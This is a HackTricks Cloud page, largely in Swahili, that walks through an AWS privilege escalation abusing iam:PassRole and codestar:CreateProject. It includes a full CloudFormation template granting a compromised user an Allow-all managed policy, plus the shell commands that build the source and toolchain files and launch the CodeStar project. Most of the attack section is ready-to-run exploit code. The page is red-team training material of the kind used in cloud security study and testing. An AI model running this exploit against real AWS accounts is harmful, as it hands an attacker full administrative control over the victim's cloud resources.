iam:PassRole, codestar:CreateProject

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Kwa ruhusa hizi unaweza kutumia jukumu la codestar IAM kufanya vitendo vya kiholela kupitia kigezo cha cloudformation.

Ili kutumia hii unahitaji kuunda sanduku la S3 ambalo linaweza kufikiwa kutoka kwa akaunti iliyoshambuliwa. Pakia faili inayoitwa toolchain.json. Faili hii inapaswa kuwa na kigezo cha cloudformation exploit. Ifuatayo inaweza kutumika kuweka sera inayosimamiwa kwa mtumiaji chini ya udhibiti wako na kumpa ruhusa za admin:

toolchain.json

{
"Resources": {
"supercodestar": {
"Type": "AWS::IAM::ManagedPolicy",
"Properties": {
"ManagedPolicyName": "CodeStar_supercodestar",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
},
"Users": [
"<compromised username>"
]
}
}
}
}

Pia pakia faili hili la empty zip kwenye bucket:

22B

empty.zip

archive

Kumbuka kwamba bucket yenye faili zote mbili inapaswa kufikiwa na akaunti ya mwathirika.

Kwa vitu vyote viwili kupakiwa sasa unaweza kuendelea na exploitation kwa kuunda mradi wa codestar:

PROJECT_NAME="supercodestar"

# Crecte the source JSON
## In this JSON the bucket and key (path) to the empry.zip file is used
SOURCE_CODE_PATH="/tmp/surce_code.json"
SOURCE_CODE="[
{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"empty.zip\"
}
},
\"destination\": {
\"codeCommit\": {
\"name\": \"$PROJECT_NAME\"
}
}
}
]"
printf "$SOURCE_CODE" > $SOURCE_CODE_PATH

# Create the toolchain JSON
## In this JSON the bucket and key (path) to the toolchain.json file is used
TOOLCHAIN_PATH="/tmp/tool_chain.json"
TOOLCHAIN="{
\"source\": {
\"s3\": {
\"bucketName\": \"privesc\",
\"bucketKey\": \"toolchain.json\"
}
},
\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
}"
printf "$TOOLCHAIN" > $TOOLCHAIN_PATH

# Create the codestar project that will use the cloudformation epxloit to privesc
aws codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME \
--source-code file://$SOURCE_CODE_PATH \
--toolchain file://$TOOLCHAIN_PATH

Huu ni uvunjaji unaotegemea uvunjaji wa Pacu wa haki hizi: https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997 Juu yake unaweza kupata toleo la kuunda sera ya usimamizi wa admin kwa jukumu badala ya kwa mtumiaji.

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za uvunjaji kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Previouscodestar:CreateProject, codestar:AssociateTeamMember NextAWS - Cloudformation Privesc

Last updated 1 month ago